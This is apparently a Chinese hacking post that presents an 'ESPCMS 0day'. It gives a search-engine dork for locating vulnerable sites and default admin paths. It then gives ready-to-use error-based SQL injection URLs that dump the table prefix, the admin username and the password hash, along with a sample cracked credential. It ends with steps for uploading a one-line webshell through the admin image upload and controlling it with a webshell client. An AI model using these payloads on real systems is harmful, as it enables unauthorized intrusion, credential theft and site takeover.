ESPCMS通殺0day

百度關鍵字:inurl:index.php?ac=article&at=read&did=

===========================================================================================================

默認後臺:adminsoft/index.php   OR    admin

===========================================================================================================

爆表前綴:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

 

===========================================================================================================
爆用戶：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

===========================================================================================================

爆密碼：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

===========================================================================================================

密碼和用戶一次性爆：index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,password)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

                        

 用戶名：admin   密碼： 64039aa42fa57087e880a77a10f10298     （最後面的1數字不是 ，只截止到前32位,破解得 admin_tmtmw）

 

===========================================================================================================

拿shell:
進到後臺後，直接點擊分類圖片===修改==選擇文件===直接上傳一句話***

而後用菜刀鏈接………………………………

PS：當上傳不了php網馬時，去系統設置一下，添加圖片上傳格式 |php 。這樣就能夠上傳一個圖片文件頭的網馬